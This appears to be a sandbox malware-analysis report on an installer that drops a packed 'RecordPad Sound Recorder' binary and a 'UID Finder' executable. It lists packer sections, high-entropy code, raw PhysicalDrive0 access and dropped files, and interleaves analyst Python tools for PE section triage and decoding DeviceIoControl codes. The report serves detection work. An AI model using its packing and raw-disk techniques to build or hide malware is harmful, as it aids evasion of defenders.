Source: Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb | source: is-EAHN0.tmp.1.dr
Source: Binary string: C:\Users\qt\work\qt\qtwinextras\lib\Qt5WinExtras.pdb | source: is-RV2D1.tmp.1.dr
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Xml.pdb | source: is-KI2RB.tmp.1.dr
Source: Binary string: C:\msys64\home\--\src\ffmpeg\libavdevice\avdevice-58.pdb | source: is-JNDNQ.tmp.1.dr
Source: Binary string: C:\msys64\home\--\src\openh264-2.0.0_x64\openh264.pdb | source: is-PRP4U.tmp.1.dr
Source: Binary string: C:\msys64\home\--\src\ffmpeg\libavdevice\avdevice-58.pdb## | source: is-JNDNQ.tmp.1.dr
Source: Binary string: C:\Users\qt\work\qt\qtsvg\lib\Qt5Svg.pdb** | source: is-KU10K.tmp.1.dr
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5OpenGL.pdb | source: is-0C056.tmp.1.dr
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5OpenGL.pdb33 | source: is-0C056.tmp.1.dr
Source: Binary string: C:\Users\qt\work\qt\qtsvg\lib\Qt5Svg.pdb | source: is-KU10K.tmp.1.dr
Source: Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb | source: is-8ECK7.tmp.1.dr

Data Obfuscation

Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Unpacked PE file: 3.2.recordpadsoundrecorder32.exe.400000.0.unpack .text:ER;.bhead8:R;.data:W;.rsrc:R;.chead8:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Unpacked PE file: 4.2.recordpadsoundrecorder32.exe.400000.0.unpack .text:ER;.bhead8:R;.data:W;.rsrc:R;.chead8:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Unpacked PE file: 3.2.recordpadsoundrecorder32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Unpacked PE file: 4.2.recordpadsoundrecorder32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00447F60 LoadLibraryExA,LoadLibraryA,GetProcAddress
Source: recordpadsoundrecorder32.exe.1.dr | Static PE information: section name: .bhead8
Source: recordpadsoundrecorder32.exe.1.dr | Static PE information: section name: .chead8
Source: is-UCHQL.tmp.1.dr | Static PE information: section name: .vcp1208
Source: is-K3HBS.tmp.1.dr | Static PE information: section name: .didat
Source: is-PRP4U.tmp.1.dr | Static PE information: section name: .rodata
Source: is-VDBC5.tmp.1.dr | Static PE information: section name: _RDATA
Source: UID Finder 6.11.66.exe.3.dr | Static PE information: section name: .bhead8
Source: UID Finder 6.11.66.exe.3.dr | Static PE information: section name: .chead8
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Code function: 0_2_00406518 push 00406555h; ret (at 0_2_0040654D)
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Code function: 0_2_00408028 push ecx; mov dword ptr [esp], eax (at 0_2_0040802D)
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Code function: 0_2_004040B5 push eax; ret (at 0_2_004040F1)
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Code function: 0_2_00404185 push 00404391h; ret (at 0_2_00404389)
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Code function: 0_2_00404206 push 00404391h; ret (at 0_2_00404389)
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Code function: 0_2_0040C218 push eax; ret (at 0_2_0040C219)
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Code function: 0_2_004042E8 push 00404391h; ret (at 0_2_00404389)
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Code function: 0_2_00404283 push 00404391h; ret (at 0_2_00404389)
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Code function: 0_2_00408E5C push 00408E8Fh; ret (at 0_2_00408E87)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_004098B4 push 004098F1h; ret (at 1_2_004098E9)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00456228 push 00456260h; ret (at 1_2_00456258)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_004062CC push ecx; mov dword ptr [esp], eax (at 1_2_004062CD)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0045C574 push ecx; mov dword ptr [esp], eax (at 1_2_0045C579)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00410640 push ecx; mov dword ptr [esp], edx (at 1_2_00410645)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0040A6C8 push esp; retf (at 1_2_0040A6D1)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0047E6EC push 0047E7CAh; ret (at 1_2_0047E7C2)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00412898 push 004128FBh; ret (at 1_2_004128F3)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_004308A0 push ecx; mov dword ptr [esp], eax (at 1_2_004308A5)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00442E74 push ecx; mov dword ptr [esp], ecx (at 1_2_00442E78)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00450F04 push 00450F37h; ret (at 1_2_00450F2F)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0040CF98 push ecx; mov dword ptr [esp], edx (at 1_2_0040CF9A)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0047323C push ecx; mov dword ptr [esp], edx (at 1_2_0047323D)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0040546D push eax; ret (at 1_2_004054A9)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0040F4F8 push ecx; mov dword ptr [esp], edx (at 1_2_0040F4FA)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0040553D push 00405749h; ret (at 1_2_00405741)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_004055BE push 00405749h; ret (at 1_2_00405741)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0040563B push 00405749h; ret (at 1_2_00405741)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_004056A0 push 00405749h; ret (at 1_2_00405741)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00457A94 push 00457AD8h; ret (at 1_2_00457AD0)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00419B98 push ecx; mov dword ptr [esp], ecx (at 1_2_00419B9D)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0047FD40 push ecx; mov dword ptr [esp], ecx (at 1_2_0047FD45)
Source: recordpadsoundrecorder32.exe.1.dr | Static PE information: section name: .text entropy: 7.764432846609721
Source: is-UCHQL.tmp.1.dr | Static PE information: section name: .text entropy: 7.694137885769827
Source: UID Finder 6.11.66.exe.3.dr | Static PE information: section name: .text entropy: 7.764432846609721
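The unpacked-PE lines above show recordpadsoundrecorder32.exe changing shape at run time (a .vmp0 section on disk; .bhead8, .chead8 and an executable-and-writable section in memory), and the section-name and entropy lines say the same thing statically: a .text section at 7.76 bits per byte is far above what compiled code produces. Of the other section names listed, .didat, _RDATA and .rodata are ordinary toolchain output (delay-import data, MSVC CRT, GCC); .vmp0 is VMProtect's. The triage script below is an added example, not Joe Sandbox or sample code, that checks those three properties with a minimal section-table parser so it runs offline without pefile. The constructed sample image, the 7.0 threshold and the expected/packer name lists are assumptions.

```python
"""Section-table triage for the packer evidence above: non-standard section names
(.vmp0, .bhead8, .chead8), sections that are both executable and writable, and a
.text entropy close to 8.0. Added example with a pure-Python parser; not code from
the sample or from Joe Sandbox."""
import math
import struct

# Names the usual MSVC / Delphi / GCC toolchains emit (assumed list). .didat, _RDATA and
# .rodata also appear in this report and are legitimate: delay-import data, MSVC CRT, GCC.
EXPECTED_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata",
                     ".pdata", ".tls", ".bss", ".didat", "_RDATA", ".rodata",
                     "CODE", "DATA", "BSS", ".itext", ".CRT"}
# Names tied to packers/protectors (assumed, non-exhaustive): .vmp* is VMProtect;
# .bhead8/.chead8 are carried by the dropped recordpadsoundrecorder32.exe and UID Finder binaries.
PACKER_SECTIONS = {".vmp0", ".vmp1", ".vmp2", ".bhead8", ".chead8", "UPX0", "UPX1", ".themida"}
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
ENTROPY_THRESHOLD = 7.0  # bits/byte; plain compiled x86 code usually sits around 6.0-6.6


def shannon_entropy(data):
    """Shannon entropy in bits per byte: 0.0 for empty input, 8.0 for a uniform byte spread."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe):
    """DOS header -> PE signature -> COFF header -> section table. Raises ValueError if not a PE."""
    if pe[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + size_opt
    sections = []
    for i in range(num_sections):
        # IMAGE_SECTION_HEADER is 40 bytes; keep name, raw size/offset and characteristics.
        name, _vsize, _va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, table + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "chars": chars,
                         "raw_size": raw_size, "entropy": shannon_entropy(raw)})
    return sections


def triage(pe):
    """One finding string per suspicious property; an empty list means nothing stood out."""
    findings = []
    for s in parse_sections(pe):
        n, c = s["name"], s["chars"]
        if n in PACKER_SECTIONS:
            findings.append(f"{n}: known packer/protector section name")
        elif n not in EXPECTED_SECTIONS:
            findings.append(f"{n}: non-standard section name")
        if c & IMAGE_SCN_MEM_EXECUTE and c & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{n}: executable and writable (self-modifying or unpacking stub)")
        if s["raw_size"] >= 512 and s["entropy"] > ENTROPY_THRESHOLD:
            findings.append(f"{n}: entropy {s['entropy']:.2f} > {ENTROPY_THRESHOLD} (compressed or encrypted)")
    return findings


def build_sample_pe(sections):
    """Constructed test image (not a real binary): DOS header, PE signature, COFF header,
    zeroed PE32 optional header, section table, then raw section data at 512-byte alignment."""
    e_lfanew, size_opt = 0x40, 224
    hdr_end = e_lfanew + 4 + 20 + size_opt + 40 * len(sections)
    raw_ptr = (hdr_end + 0x1FF) & ~0x1FF
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_opt, 0x0102)
    table, blobs, ptr, va = b"", b"", raw_ptr, 0x1000
    for name, data, chars in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(data), va, len(data), ptr, 0, 0, 0, 0, chars)
        blobs += data
        ptr += len(data)
        va += (len(data) + 0xFFF) & ~0xFFF
    image = dos + b"PE\0\0" + coff + b"\0" * size_opt + table
    return image + b"\0" * (raw_ptr - len(image)) + blobs


def demo():
    """Mimics the report's layout: clean .text, a VMProtect-style .vmp0 blob, an RWX .chead8."""
    code = b"\x55\x8b\xec\x83\xec\x10\x53\x56" * 512          # prologue-like bytes, entropy 3.0
    blob = bytes((i * 131 + 17) & 0xFF for i in range(4096))  # every byte value 16 times, entropy 8.0
    rx = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
    return triage(build_sample_pe([(".text", code, rx), (".vmp0", blob, rx),
                                   (".chead8", b"\0" * 1024, rx | IMAGE_SCN_MEM_WRITE)]))


if __name__ == "__main__":
    for line in demo():
        print(line)
```

On a real sample, pass the file bytes to triage(); the three findings it reports correspond one-to-one to the unpacked-PE, section-name and entropy lines in this report, which is what makes the script a usable pre-filter before sandboxing.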

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 3_2_00401A4F CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_00401A4F CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_0260F851 CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0
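The three lines above show CreateFileA on \\.\PhysicalDrive0 followed by DeviceIoControl, but not the control code. That API sequence fits both a boot-sector operation and a disk-serial fingerprint used to derive a per-machine bot ID, and only the control code (the second argument at the call site) tells them apart; an actual overwrite of sector 0 would additionally appear as SetFilePointer/WriteFile on the same handle, which this section does not list. The decoder below is an added analyst helper, not Joe Sandbox or sample code. The control-code values are the Windows SDK definitions; the fingerprint/disk-modify classification is an assumption made for triage.

```python
r"""Decode DeviceIoControl control codes seen on a \\.\PhysicalDriveN handle.
Added analyst helper, not code from the sample or from Joe Sandbox."""

# CTL_CODE layout (winioctl.h): DeviceType[31:16] | Access[15:14] | Function[13:2] | Method[1:0]
DEVICE_TYPES = {0x02: "FILE_DEVICE_CD_ROM", 0x07: "FILE_DEVICE_DISK",
                0x09: "FILE_DEVICE_FILE_SYSTEM", 0x2D: "FILE_DEVICE_MASS_STORAGE"}
METHODS = ("METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER")
ACCESS = ("FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
          "FILE_READ_ACCESS|FILE_WRITE_ACCESS")

# Control codes as defined in the Windows SDK headers, with an assumed triage class:
# "fingerprint" = read-only identity/geometry query, "disk-modify" = changes on-disk structures.
KNOWN_CODES = {
    0x002D1400: ("IOCTL_STORAGE_QUERY_PROPERTY", "fingerprint"),     # serial number, bus type
    0x002D1080: ("IOCTL_STORAGE_GET_DEVICE_NUMBER", "fingerprint"),
    0x00070000: ("IOCTL_DISK_GET_DRIVE_GEOMETRY", "fingerprint"),
    0x000700A0: ("IOCTL_DISK_GET_DRIVE_GEOMETRY_EX", "fingerprint"),
    0x0007405C: ("IOCTL_DISK_GET_LENGTH_INFO", "fingerprint"),
    0x00070048: ("IOCTL_DISK_GET_PARTITION_INFO_EX", "fingerprint"),
    0x0007C088: ("SMART_RCV_DRIVE_DATA", "fingerprint"),              # ATA IDENTIFY: model/serial
    0x0007C054: ("IOCTL_DISK_SET_DRIVE_LAYOUT_EX", "disk-modify"),    # rewrites the partition table
    0x00090018: ("FSCTL_LOCK_VOLUME", "disk-modify"),                 # volume handles; precedes raw writes
    0x00090020: ("FSCTL_DISMOUNT_VOLUME", "disk-modify"),
}


def ctl_code(device_type, function, method, access):
    """Python port of the CTL_CODE macro, used to cross-check table entries."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ctl_code(code):
    """Split a control code into its fields and name it if it is in the table."""
    name, cls = KNOWN_CODES.get(code, (None, "unknown"))
    dev = (code >> 16) & 0xFFFF
    return {
        "code": f"0x{code:08X}",
        "name": name,
        "class": cls,
        "device": DEVICE_TYPES.get(dev, f"0x{dev:04X}"),
        "access": ACCESS[(code >> 14) & 3],
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 3],
    }


def assess_physicaldrive_call(code, write_file_on_handle=False):
    r"""Verdict for CreateFileA(\\.\PhysicalDriveN) + DeviceIoControl(code).
    A SetFilePointer/WriteFile sequence on the same handle is what actually rewrites
    sector 0, so its presence overrides any read-only IOCTL."""
    if write_file_on_handle:
        return "disk-modify"
    return decode_ctl_code(code)["class"]


if __name__ == "__main__":
    # Constructed example: codes an analyst might read off the stack at the DeviceIoControl call.
    for code in (0x002D1400, 0x0007C054, 0x00071234):
        print(decode_ctl_code(code), assess_physicaldrive_call(code))
```

In practice the code is read from the second DeviceIoControl argument at 3_2_00401A4F in a debugger or from an API-monitor trace; a "fingerprint" verdict with no WriteFile on the handle points to machine identification rather than persistence, while a WriteFile on \\.\PhysicalDrive0 is the evidence a boot-sector finding needs.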
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-RV2D1.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-6P98M.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5WinExtras.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5Xml.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\avdevice-58.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-PRP4U.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-C4R5U.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\libmp3lame.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\openh264.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5OpenGL.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-O2PKH.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcr120.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-FR4FM.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\libeay32.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UTKLG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_setup64.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_RegDLL.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp120.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\libcurl.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-0C056.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-KU10K.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-K3HBS.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp140.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeFile created: C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-KI2RB.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-8ECK7.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-VDBC5.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-EAHN0.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UCHQL.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_iscrypt.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp140_1.dll (copy)Jump to dropped file
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeFile created: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-JNDNQ.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\mousehelper.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5Svg.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\QtAVWidgets1.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeFile created: C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exeJump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0 3_2_00401A4F
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0 4_2_00401A4F
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0 4_2_0260F851
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 3_2_00402299 StartServiceCtrlDispatcherA
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00423B7C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0047E0A8 IsIconic,GetWindowLongA,ShowWindow,ShowWindow
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0042414C IsIconic,SetActiveWindow,SetFocus
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00424104 IsIconic,SetActiveWindow
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_004182F4 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_004227CC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00417508 IsIconic,GetCapture
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00417C40 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00417C3E IsIconic,SetWindowPos
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0044B08C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
